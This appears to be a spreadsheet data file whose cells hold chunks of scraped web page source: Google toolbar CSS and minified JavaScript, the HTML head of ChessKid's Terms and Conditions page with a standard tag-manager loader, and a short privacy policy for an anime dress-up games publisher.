    <t>not(.gb_Md){opacity:.87}.gb_9c{color:inherit;opacity:1;text-rendering:optimizeLegibility;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.gb_Jc .gb_9c,.gb_Kd .gb_9c{opacity:1}.gb_Nd{position:relative}.gb_Od{font-family:arial,sans-serif;line-height:normal;padding-right:15px}a.gb_q,span.gb_q{color:rgba(0,0,0,.87);text-decoration:none}.gb_Jc a.gb_q,.gb_Jc span.gb_q{color:white}a.gb_q:focus{outline-offset:2px}a.gb_q:hover{text-decoration:underline}.gb_r{display:inline-block;padding-left:15px}.gb_r .gb_q{display:inline-block;line-height:24px;vertical-align:middle}.gb_Pd{font-family:Google Sans,Roboto,Helvetica,Arial,sans-serif;font-weight:500;font-size:14px;letter-spacing:.25px;line-height:16px;margin-left:10px;margin-right:8px;min-width:96px;padding:9px 23px;text-align:center;vertical-align:middle;-moz-border-radius:4px;-webkit-border-radius:4px;border-radius:4px;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}.gb_Fa.gb_Ed .gb_Pd{margin-left:8px}#gb a.gb_ja.gb_ja.gb_Pd{cursor:pointer}.gb_ja.gb_Pd:hover{background:#1b66c9;-webkit-box-shadow:0 1px 3px 1px</t>
  </si>
  <si>
    <t>rgba(66,64,67,.15),0 1px 2px 0 rgba(60,64,67,.3);-moz-box-shadow:0 1px 3px 1px rgba(66,64,67,.15),0 1px 2px 0</t>
  </si>
  <si>
    <t>rgba(60,64,67,.3);box-shadow:0 1px 3px 1px rgba(66,64,67,.15),0 1px 2px 0 rgba(60,64,67,.3)}.gb_ja.gb_Pd:focus,.gb_ja.gb_Pd:hover:focus{background:#1c5fba;-webkit-box-shadow:0 1px 3px 1px rgba(66,64,67,.15),0 1px 2px 0</t>
  </si>
  <si>
    <t>rgba(60,64,67,.3);-moz-box-shadow:0 1px 3px 1px rgba(66,64,67,.15),0 1px 2px 0 rgba(60,64,67,.3);box-shadow:0 1px 3px 1px rgba(66,64,67,.15),0 1px 2px 0 rgba(60,64,67,.3)}.gb_ja.gb_Pd:active{background:#1b63c1;-webkit-box-shadow:0 1px 3px 1px rgba(66,64,67,.15),0</t>
  </si>
  <si>
    <t>1px 2px 0 rgba(60,64,67,.3);-moz-box-shadow:0 1px 3px 1px rgba(66,64,67,.15),0 1px 2px 0</t>
  </si>
  <si>
    <t>rgba(60,64,67,.3);box-shadow:0 1px 3px 1px rgba(66,64,67,.15),0 1px 2px 0 rgba(60,64,67,.3)}.gb_Pd{background:#1a73e8;border:1px solid transparent}.gb_Fa.gb_Ha .gb_Pd{padding:9px</t>
  </si>
  <si>
    <t>15px;min-width:80px}.gb_Qd{text-align:left}#gb .gb_Jc a.gb_Pd: not(.gb_g),#gb.gb_Jc a.gb_Pd{background:#fff;border-color:#dadce0;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;color:#1a73e8}#gb a.gb_ja.gb_g.gb_Pd{background:#8ab4f8;border:1px solid transparent;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;color:#202124}#gb .gb_Jc a.gb_Pd:hover:not(.gb_g),#gb.gb_Jc a.gb_Pd:hover{background:#f8fbff;border-color:#cce0fc}#gb a.gb_ja.gb_g.gb_Pd:hover{background:#93baf9;border-color:transparent;-webkit-box-shadow:0 1px 3px 1px rgba(0,0,0,.15),0 1px 2px rgba(0,0,0,.3);-moz-box-shadow:0 1px 3px 1px rgba(0,0,0,.15),0 1px 2px</t>
  </si>
  <si>
    <t>rgba(0,0,0,.3);box-shadow:0 1px 3px 1px rgba(0,0,0,.15),0 1px 2px rgba(0,0,0,.3)}#gb .gb_Jc a.gb_Pd:focus:not(.gb_g),#gb .gb_Jc a.gb_Pd:focus:hover:not(.gb_g),#gb.gb_Jc a.gb_Pd:focus:not(.gb_g),#gb.gb_Jc a.gb_Pd:focus:hover:not(.gb_g){background:#f4f8ff;outline:1px solid #c9ddfc}#gb a.gb_ja.gb_g.gb_Pd:focus,#gb a.gb_ja.gb_g.gb_Pd:focus:hover{background:#a6c6fa;border-color:transparent;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none}#gb .gb_Jc a.gb_Pd:active:not(.gb_g),#gb.gb_Jc a.gb_Pd:active{background:#ecf3fe}#gb a.gb_ja.gb_g.gb_Pd:active{background:#a1c3f9;-webkit-box-shadow:0 1px 2px rgba(60,64,67,.3),0 2px 6px 2px rgba(60,64,67,.15);-moz-box-shadow:0 1px 2px rgba(60,64,67,.3),0 2px 6px</t>
  </si>
  <si>
    <t>2px rgba(60,64,67,.15);box-shadow:0 1px 2px rgba(60,64,67,.3),0 2px 6px 2px rgba(60,64,67,.15)}.gb_Sd{display:none}@media screen and (max-width:319px){.gb_sd:not(.gb_xd) .gb_N{display: none;visibility:hidden}}.gb_za{background-color:rgba(255,255,255,.88);border:1px solid #dadce0;-webkit-box-sizing:border-box;box-sizing:border-box;cursor:pointer;display:inline-block;max-height:48px;overflow:hidden;outline:none;padding:0;vertical-align:middle;width:134px;-moz-border-radius:8px;-webkit-border-radius:8px;border-radius:8px}.gb_za.gb_g{background-color:transparent;border:1px solid #5f6368}.gb_Aa{display:inherit}.gb_za.gb_g .gb_Aa{background:#fff;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;display:inline-block;left:8px;margin-right:5px;position:relative;padding:3px;top:-1px}.gb_za:hover{border:1px solid #d2e3fc;background-color:rgba(248,250,255,.88)}.gb_za.gb_g:hover{background-color:rgba(241,243,244,.04);border:1px solid #5f6368}.gb_za:focus-visible,.gb_za:focus{background-color:rgba(255,255,255);outline:1px solid #202124;-moz-box-shadow:0px 1px 2px 0px</t>
  </si>
  <si>
    <t>rgba(60,64,67,.3),0px 1px 3px 1px rgba(60,64,67,.15);-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.3),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px</t>
  </si>
  <si>
    <t>0px rgba(60,64,67,.3),0px 1px 3px 1px rgba(60,64,67,.15)}.gb_za.gb_g:focus-visible,.gb_za.gb_g:focus{background-color:rgba(241,243,244,.12);outline:1px solid #f1f3f4;-moz-box-shadow:0 1px 3px 1px rgba(0,0,0,.15),0 1px 2px 0 rgba(0,0,0,.3);-webkit-box-shadow:0 1px 3px 1px rgba(0,0,0,.15),0 1px 2px 0</t>
  </si>
  <si>
    <t>rgba(0,0,0,.3);box-shadow:0 1px 3px 1px rgba(0,0,0,.15),0 1px 2px 0 rgba(0,0,0,.3)}.gb_za.gb_g:active,.gb_za.gb_Ba.gb_g:focus{background-color:rgba(241,243,244,.1);border:1px solid #5f6368}.gb_Ca{display:inline-block;padding-bottom:2px;padding-left:7px;padding-top:2px;text-align:center;vertical-align:middle;line-height:32px;width:78px}.gb_za.gb_g .gb_Ca{line-height:26px;margin-left:0;padding-bottom:0;padding-left:0;padding-top:0;width:72px}.gb_Ca.gb_Da{background-color:#f1f3f4;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;margin-left:8px;padding-left:0}.gb_Ca.gb_Da .gb_Ea{vertical-align:middle}.gb_Fa:not(.gb_Ha) .gb_za{margin-left:10px;margin-right:4px}.gb_Ia{max-height:32px;width:78px}.gb_za.gb_g .gb_Ia{max-height:26px;width:72px}.gb_h{-webkit-background-size:32px 32px;-o-background-size:32px 32px;background-size:32px 32px;border:0;-webkit-border-radius:50%;-moz-border-radius:50%;border-radius:50%;display:block;margin:0px;position:relative;height:32px;width:32px;z-index:0}.gb_Sa{background-color:#e8f0fe;border:1px solid rgba(32,33,36,.08);position:relative}.gb_Sa.gb_h{height:30px;width:30px}.gb_Sa.gb_h:hover,.gb_Sa.gb_h:active{-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none}.gb_Ta{background:#fff;border:none;-webkit-border-radius:50%;-moz-border-radius:50%;border-radius:50%;bottom:2px;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);-moz-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px</t>
  </si>
  <si>
    <t>1px 3px 1px rgba(60,64,67,.15);height:14px;margin:2px;position:absolute;right:0;width:14px}.gb_Ua{color:#1f71e7;font:400 22px/32px Google Sans,Roboto,Helvetica,Arial,sans-serif;text-align:center;text-transform:uppercase}@media (min-resolution:1.25dppx),(-o-min-device-pixel-ratio:5/4),(-webkit-min-device-pixel-ratio:1.25),(min-device-pixel-ratio:1.25){.gb_h::before,.gb_Va::before{display:inline-block;-webkit-transform:scale(.5);-moz-transform:scale(.5);-ms-transform:scale(.5);-o-transform:scale(.5);transform:scale(.5);-webkit-transform-origin:left 0;-moz-transform-origin:left 0;-ms-transform-origin:left 0;-o-transform-origin:left 0;transform-origin:left 0}.gb_v .gb_Va::before{-webkit-transform:scale(0.416666667);-moz-transform:scale(0.416666667);-ms-transform:scale(0.416666667);-o-transform:scale(0.416666667);transform:scale(0.416666667)}}.gb_h:hover,.gb_h:focus{-moz-box-shadow:0 1px 0 rgba(0,0,0,.15);-webkit-box-shadow:0 1px 0 rgba(0,0,0,.15);box-shadow:0 1px 0 rgba(0,0,0,.15)}.gb_h:active{-moz-box-shadow:inset 0 2px 0</t>
  </si>
  <si>
    <t>rgba(0,0,0,.15);-webkit-box-shadow:inset 0 2px 0 rgba(0,0,0,.15);box-shadow:inset 0 2px 0 rgba(0,0,0,.15)}.gb_h:active::after{background:rgba(0,0,0,.1);-webkit-border-radius:50%;-moz-border-radius:50%;border-radius:50%;content:"";display:block;height:100%}.gb_Wa{cursor:pointer;line-height:40px;min-width:30px;opacity:.75;overflow:hidden;vertical-align:middle;-o-text-overflow:ellipsis;text-overflow:ellipsis}.gb_e.gb_Wa{width:auto}.gb_Wa:hover,.gb_Wa:focus{opacity:.85}.gb_Xa .gb_Wa,.gb_Xa .gb_Za{line-height:26px}#gb#gb.gb_Xa a.gb_Wa,.gb_Xa .gb_Za{font-size:11px;height:auto}.gb_0a{border-top:4px solid #000;border-left:4px dashed transparent;border-right:4px dashed transparent;display:inline-block;margin-left:6px;opacity:.75;vertical-align:middle}.gb_1a:hover .gb_0a{opacity:.85}.gb_za&gt;.gb_b{padding:3px</t>
  </si>
  <si>
    <t>3px 3px 4px}.gb_2a.gb_Ra{color:#fff}.gb_t .gb_Wa,.gb_t .gb_0a{opacity:1}#gb#gb.gb_t.gb_t a.gb_Wa,#gb#gb .gb_t.gb_t</t>
  </si>
  <si>
    <t>a.gb_Wa{color:#fff}.gb_t.gb_t .gb_0a{border-top-color:#fff;opacity:1}.gb_O .gb_h:hover,.gb_t .gb_h: hover,.gb_O .gb_h:focus,.gb_t .gb_h:focus{-moz-box-shadow:0 1px 0 rgba(0,0,0,.15),0 1px 2px rgba(0,0,0,.2);-webkit-box-shadow:0 1px 0 rgba(0,0,0,.15),0</t>
  </si>
  <si>
    <t>1px 2px rgba(0,0,0,.2);box-shadow:0 1px 0 rgba(0,0,0,.15),0 1px 2px rgba(0,0,0,.2)}.gb_3a .gb_b,.gb_4a .gb_b{position:absolute;right:1px}.gb_b.gb_s,.gb_5a.gb_s,.gb_1a.gb_s{-webkit-flex:0 1 auto;flex:0 1 auto;-webkit-flex:0 1 main-size;flex:0 1 main-size}.gb_6a.gb_7a .gb_Wa{width:30px!important}.gb_d{height:40px;position:</t>
  </si>
  <si>
    <t>absolute;right:-5px;top:-5px;width:40px}.gb_8a .gb_d,.gb_9a .gb_d{right:0;top:0}.gb_b .gb_e{padding:4px}.gb_k{display :</t>
  </si>
  <si>
    <t>none}sentinel{}&lt;/style&gt;&lt;script nonce="rrInQMIK-x9E_tEoYvJkDA"&gt;DOCS_timing['ojls']=new Date().getTime();&lt;/script&gt;&lt;script nonce="rrInQMIK-x9E_tEoYvJkDA"&gt;;this.gbar_={CONFIG:[[[0,"www.gstatic.com","og.qtm.en_US.fnClKEjbOGI.es5.O","com","en","25",0,[4,2,"","","","521331066","0"],null,"yTY3ZJa5DabRptQPwruu8A0",null,0,"og.qtm.cj0b4GcU24c. L.X.O","AA2YrTtl0TXv7bY2fDroehoU7vFTrgVpRA","AA2YrTs1GsWq-l8abt8Gvq-GfLnLOuudPw","",2,1,200,"USA",null,null,"25","25",1],null,[1,0.1000000014901161,2,1],[1,0.001000000047497451,1],[0,0,0,null,"","","","",0,0,0],[0,0,"",1,0,0,0,0,0,0,null,0,0,null,0,0,null,null,0,0,0,"","","","","","",null,0,0,0,0,0,null,null,null,"rgba(32,33,36,1)","rgba(255,255,255,1)",0,0,0,null,null,1,0,0],null,null,["1","gci_91f30755d6a6b787dcc2a4062e6e9824.js","googleapis.client:gapi.iframes","","en"],null,null,null,null,["m;/_/scs/abc-static/_/js/k=gapi.gapi.en.fpEXMBCWMKc. O/d=1/rs=AHpOoo9SQGHwxhl93I-W5KEIEdf87vGuqQ/m=__features__","https://apis.google.com","","","","",null,1,"es_plusone_gc_20230306.0_p1","en",null,0],[0.009999999776482582,"com","25",[null,"","0",null,1,5184000,null,null,"",null,null,null,null,null,0,null,0,0,1,0,0,0,null,null,0,0,null,0,0,0,0,0],null,null,null,0,null,null,["5061451","google\\.(com|ru|ca|by|kz|com\\.mx|com\\.tr)$",1]],[1,1,null,28834,25,"USA","en","521331066.0",8,0.009999999776482582,0,0,null,null,null,null,"",null,null,null,"yTY3ZJa5DabRptQPwruu8A0",0,0,0,null,2,5,"gh",75,0,0,0,0,1],[[null,null,null,"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.fnClKEjbOGI.es5.O/rt=j/m=qabr,q_dnp,qapid/exm=qaaw,qadd,qaid,qein,qhaw,qhba,qhbr,qhch,qhga,qhid,qhin,qhpr/d=1/ed=1/rs=AA2YrTtl0TXv7bY2fDroehoU7vFTrgVpRA"]]]],};this.gbar_=this.gbar_||{};(function(_){var window=this;
try{
/*
 Copyright The Closure Library Authors.
 SPDX-License-Identifier: Apache-2.0
*/
var ta,La,Ma,Na,Pa,Va,Xa,Wa,Za,$a,ab,eb,bb,hb,ib,mb,nb,ob,pb,qb,rb,tb,ub,yb;_.aa=function(a,b){if(Error.captureStackTrace)Error.captureStackTrace(this,_.aa);else{var c=Error().stack;c&amp;&amp;(this.stack=c)}a&amp;&amp;(this.message=String(a));void 0!==b&amp;&amp;(this.cause=b)};_.ba=function(){var a=_.p.navigator;return a&amp;&amp;(a=a.userAgent)?a:""};_.ea=function(a){return ca?_.da?_.da.brands.some(function(b){return(b=b.brand)&amp;&amp;-1!=b.indexOf(a)}):!1:!1};_.q=function(a){return-1!=_.ba().indexOf(a)};
_.fa</t>
  </si>
  <si>
    <t>b="",c=0,d=a.length-10240;c&lt;d;)b+=String.fromCharCode.apply(null,a.subarray(c,c+=10240));b+=String.fromCharCode.apply(null,c?a.subarray(c):a);return btoa(b)};
_.Da =function(a){return Ca&amp;&amp;null!=a&amp;&amp;a instanceof Uint8Array};_.Fa=function(a,b){if(_.Ea)return a[_.Ea]|=b;if(void 0!==a.wb)return a.wb|=b;Object.defineProperties(a,{wb:{value:b,configurable:!0,writable:!0,enumerable:!1}});return b};_.Ia=function(a,b){var c=_.Ga(a);(c&amp;b)!==b&amp;&amp;(Object.isFrozen(a)&amp;&amp;(a=Array.prototype.slice.call(a)),_.Ha(a,c|b));return a};_.Ga=function(a){var b;_.Ea?b=a[_.Ea]:b=a.wb;return null==b?0:b};
_.Ha</t>
  </si>
  <si>
    <t>a.j()}}return a};Xa=function(a,b,c,d,e,f){if(null!=a){if(Array.isArray(a))a=e&amp;&amp;0==a.length&amp;&amp;_.Ga(a)&amp;1?void 0:f&amp;&amp;_.Ga(a)&amp;2?a:Wa(a,b,c,void 0!==d,e,f);else if(Na(a)){var g={},h;for(h in a)g[h]=Xa(a[h],b,c,d,e,f);a=g}else a=b(a,d);return a}};
Wa=function(a,b,c,d,e,f){var g=_.Ga(a);d=d?!!(g&amp;16):void 0;a=Array.prototype.slice.call(a);for(var h=0;h&lt;a.length;h++)a[h]=Xa(a[h],b,c,d,e,f);c(g,a);return a};Za=function(a){return a.Ce===Ya?a.toJSON():Va(a)};$a=function(a,b){a&amp;128&amp;&amp;Pa(b)};
ab=function(a,b,c){c=void 0===c?Ma:c;if(null!=a){if(Ca&amp;&amp;a instanceof Uint8Array)return b?a:new Uint8Array(a);if(Array.isArray(a)){var d=_.Ga(a);if(d&amp;2)return a;if(b&amp;&amp;!(d&amp;32)&amp;&amp;(d&amp;16||0===d))return _.Ha(a,d|18),a;a=Wa(a,ab,d&amp;4?Ma:c,!0,!1,!0);b=_.Ga(a);b&amp;4&amp;&amp;b&amp;2&amp;&amp;Object.freeze(a);return a}return a.Ce===Ya?bb(a):a}};eb=function(a,b,c,d,e,f,g){(a=a.i&amp;&amp;a.i[c])?(d=_.Ga(a),d&amp;2?d=a:(f=_.cb(a,bb),Ma(d,f),Object.freeze(f),d=f),_.db(b,c,d,e)):_.r(b,c,ab(d,f,g),e)};
bb=function(a){if(_.Ga(a.na)&amp;2)return a;a=_.fb(a,!0);_.Fa(a.na,18);return a};_.fb=function(a,b){var c=a.na,d=_.Ka([]),e=a.constructor.i;e&amp;&amp;d.push(e);e=a.kb;if(e){d.length=c.length;var f={};d[d.length-1]=f}0!==(_.Ga(c)&amp;128)&amp;&amp;Pa(d);b=b||a.Hb()?Ma:La;d=_.Ta(a.constructor,d);a.kd&amp;&amp;(d.kd=a.kd.slice());f=!!(_.Ga(c)&amp;16);for(var g=e?c.length-1:c.length,h=0;h&lt;g;h++)eb(a,d,h-a.Xb,c[h],!1,f,b);if(e)for(var l in e)eb(a,d,+l,e[l],!0,f,b);return d};
_.gb =function(a){if(!(_.Ga(a.na)&amp;2))return a;var b=_.fb(a,!1);b.s=a;return b};hb=function(a,b){if(Array.isArray(a)){var c=_.Ga(a),d=1;!b||c&amp;2||(d|=16);(c&amp;d)!==d&amp;&amp;_.Ha(a,c|d)}};ib=function(a,b){return Va(b)};_.t=function(a,b){return null!=a?!!a:!!b};_.u=function(a,b){void 0==b&amp;&amp;(b="");return null!=a?a:b};_.jb=function(a,b){void 0==b&amp;&amp;(b=0);return null!=a?a:b};
_.lb =function(a,b){for(var c,d,e=1;e&lt;arguments.length;e++){d=arguments[e];for(c in d)a[c]=d[c];for(var f=0;f&lt;kb.length;f++)c=kb[f],Object.prototype.hasOwnProperty.call(d,c)&amp;&amp;(a[c]=d[c])}};mb=function(a){var b=0;return function(){return b&lt;a.length?{done:!1,value:a[b++]}:{done:!0}}};nb="function"==typeof</t>
  </si>
  <si>
    <t>Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};
ob=function(a){a=["object"==typeof globalThis&amp;&amp;globalThis,a,"object"==typeof window&amp;&amp;window,"object"==typeof self&amp;&amp;self,"object"==typeof global&amp;&amp;global];for(var b=0;b&lt;a.length;++b){var c=a[b];if(c&amp;&amp;c. Math==Math)return c}throw Error("a");};pb=ob(this);qb=function(a,b){if(b)a:{var c</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html
    xmlns="http://www.w3.org/1999/xhtml"
    xml:lang="en"
    lang="en"
    dir="ltr"
        class="-v3-entry theme-fallback"&gt;
&lt;head&gt;
      &lt;link rel="preconnect" href="//www.googletagmanager.com"&gt;
    &lt;link rel="preconnect" href="//www.google-analytics.com"&gt;
    &lt;link rel="dns-prefetch" href="//www.googletagmanager.com"&gt;
    &lt;link rel="dns-prefetch" href="//www.google-analytics.com"&gt;
  &lt;meta charset="utf-8" /&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1" /&gt;
&lt;meta name="theme-color" content="#64a243" /&gt;
&lt;meta name="google-play-app" content="app-id=com.chesskid" /&gt;
&lt;meta name="apple-itunes-app" content="app-id=629375826" /&gt;
    &lt;meta name="description" content="i18n_translation." /&gt;
    &lt;meta property="og:description" content="i18n_translation." /&gt;
    &lt;meta property="twitter:description" content="i18n_translation."</t>
  </si>
  <si>
    <t>/&gt;
    &lt;meta property="og:image" content="https://www.chesskid.com/images/socialmedia/what_is_chesskid-2023.png" /&gt;
    &lt;meta property="twitter:image" content="https://www.chesskid.com/images/socialmedia/what_is_chesskid-2023.png" /&gt;
&lt;meta property="og:title" content="Terms and Conditions - ChessKid.com" /&gt;
&lt;meta property="og:url" content="https://www.chesskid.com/legal" /&gt;
&lt;meta property="og:type" content="website" /&gt;
&lt;meta property="og:site_name" content="ChessKid.com" /&gt;
&lt;meta property="twitter:title" content="Terms and Conditions - ChessKid.com" /&gt;
&lt;meta property="twitter:card" content="summary_large_image" /&gt;
&lt;meta property="twitter:site" content="@ChessKidcom" /&gt;
  &lt;title&gt;Terms and Conditions - ChessKid.com&lt;/title&gt;
&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-WDTG4ZN');&lt;/script&gt;
  &lt;link href="/images/favicon.ico?v=4" type="image/x-icon" rel="shortcut icon" /&gt;
&lt;link href="/images/favicon.svg?v=4" type="image/svg+xml" rel="icon" /&gt;
&lt;link rel="apple-touch-icon" sizes="180x180" href="/images/icons/touch/chesskid-180.png"&gt;
&lt;link rel="apple-touch-icon" sizes="360x360" href="/images/icons/touch/chesskid-360.png"&gt;
&lt;link rel="manifest" href="/manifest.json"&gt;
    &lt;link rel="canonical" href="https://www.chesskid.com/legal"/&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="en" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="sv" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="ru" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="sr" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="hu" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="pl" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="es" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="pt" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="de" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="fr" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="it" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="nl" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="no" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="pt-BR" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="uk" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="da" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="tr" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="fi" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="zh" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="lv" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="lt" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="ko" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="cs" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="el" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="ka" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="hr" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="mn-MN" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="bg" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="id" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="vi" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="ro" /&gt;
            &lt;link rel="alternate" href="https://www.chesskid.com/legal" hreflang="sk" /&gt;
  &lt;script type="module" crossorigin src="/js/client-prod/assets/index.79af9b96.js"&gt;&lt;/script&gt;
    &lt;link rel="modulepreload" crossorigin href="/js/client-prod/assets/@chesscom.fb2dff60.js"&gt;
    &lt;link rel="modulepreload" crossorigin href="/js/client-prod/assets/tiny-emitter.716456e0.js"&gt;
    &lt;link rel="modulepreload" crossorigin href="/js/client-prod/assets/@vue.b9e6a3e5.js"&gt;
    &lt;link rel="modulepreload" crossorigin href="/js/client-prod/assets/@amplitude.f03bffdd.js"&gt;
    &lt;link rel="modulepreload" crossorigin href="/js/client-prod/assets/axios.b49fa0b4.js"&gt;
    &lt;link rel="stylesheet" href="/js/client-prod/assets/@chesscom.7896a9c9.css"&gt;
    &lt;link rel="stylesheet" href="/js/client-prod/assets/index.fa9f78d0.css"&gt;
&lt;/head&gt;
&lt;body class="" style=""&gt;
    &lt;script&gt;
  (function () {
    if (!isBrowserSupported()) {
      var link = document.createElement('link');
      link.type = 'text/css';
      link.rel = 'stylesheet';
      link.href= '/css/legacy-popup.0497e66a.css';
      document.head.appendChild(link);
      var script = document.createElement('script');
      script.src = "https://www.chesskid.com/js/vue-legacy-popup.1419671e.js";
      document.head.appendChild(script);
    }
    function isBrowserSupported() {
      return supportsFlexGap();
    }
    function supportsFlexGap() {
      // create a flex container with row-gap set
      var flex = document.createElement('div');
      flex.style.display = 'flex';
      flex.style.flexDirection = 'column';
      flex.style.gap = '1px';
      flex.appendChild(document.createElement('div'));
      flex.appendChild(document.createElement('div'));
      document.body.insertBefore(flex, document.body.firstChild);
      // the flex container should be 1px height from the gap
      var isSupported = flex.clientHeight &gt; 0;
      flex.parentNode.removeChild(flex);
      return isSupported;
    }
  })();
&lt;/script&gt;
    &lt;script&gt;
    window.sidebars = [{"id":"impersonate","isImpersonating":false,"authUserUsername":null}];
    window.isSpa</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"/&gt;
&lt;/head&gt;
	&lt;body&gt;
		&lt;p&gt;&lt;em&gt;Last updated: 22 Nov 2022&lt;/em&gt;&lt;/p&gt;
		&lt;h1&gt;Anime Dress Up Games - Privacy Policy&lt;/h1&gt;
		&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Data Access&lt;/b&gt;
	&lt;p&gt;
		 We don't store your personal data like your email id, phone number or any other personal details on our servers. We are focused on offering the best products to users and not interested to use this data for marketing purpose or do anything like selling/sharing with other companies.
	</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Ad Tracking&lt;/b&gt;
	&lt;p&gt;
		 Our apps has third party ad networks built-in to afford the development and other involved cost to run the services and they may use and collect anonymous data about your interests to customize content and advertising in applications. Interest and location data may be linked to your device, but is not linked to your identity.
		</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;br&gt;They are:&lt;br&gt;&lt;br&gt;
		"Kidoz" (&lt;a href="https://kidoz.net/privacy-policies"&gt;Privacy Policy&lt;/a&gt;)&lt;br&gt;
		"Unity Ads" (&lt;a href="https://unity3d.com/legal/privacy-policy"&gt;Privacy Policy&lt;/a&gt;)&lt;br&gt;
		"Google Admob" (&lt;a href="https://privacy.google.com/businesses/controllerterms/"&gt;Privacy Policy&lt;/a&gt;)&lt;br&gt;
	&lt;/p&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Ad Compliance&lt;/b&gt;
	&lt;p&gt;	
		Our games show ads which are COPPA-compliant and GDPR-compliant (non-personalized) and suitable for general audiences.
	 &lt;/p&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Analytics&lt;/b&gt;
	&lt;p&gt;
		Analytics companies may access anonymous data (such as your IP address or device ID) to help us understand how our services are used. They share it with us in aggregate form; no data is shared as to any individual user.
		</t>
  </si>
  <si>
    <t>&lt;br&gt;They are:&lt;br&gt;&lt;br&gt;
		- Google Firebase&lt;br&gt;
	&lt;/p&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;External Links&lt;/b&gt;
	&lt;p&gt;
		Our games has no external links, except:&lt;br&gt;
		1. Links received from Ads.&lt;br&gt;
		2. "More Games" button - leads to the list of our other games on Google Play or App Store.&lt;br&gt;
		3.</t>
  </si>
  <si>
    <t xml:space="preserve">"Star" button - leads to the app's listing on Google Play or App Store. &lt;br&gt;
	&lt;/p&gt;
 &lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Regarding update&lt;/b&gt;
	&lt;p&gt;
		</t>
  </si>
  <si>
    <t xml:space="preserve">Our privacy policy may change from time to time. If we make any material changes to our policies, we will place a prominent notice on our website or application.
	 &lt;/p&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Contact Information&lt;/b&gt;
	&lt;p&gt;
		If you have any questions or concerns about our privacy policies, please send a mail to us on support at animedressupgames@gmail.com
	&lt;/p&gt;
&lt;/p&gt;
	&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
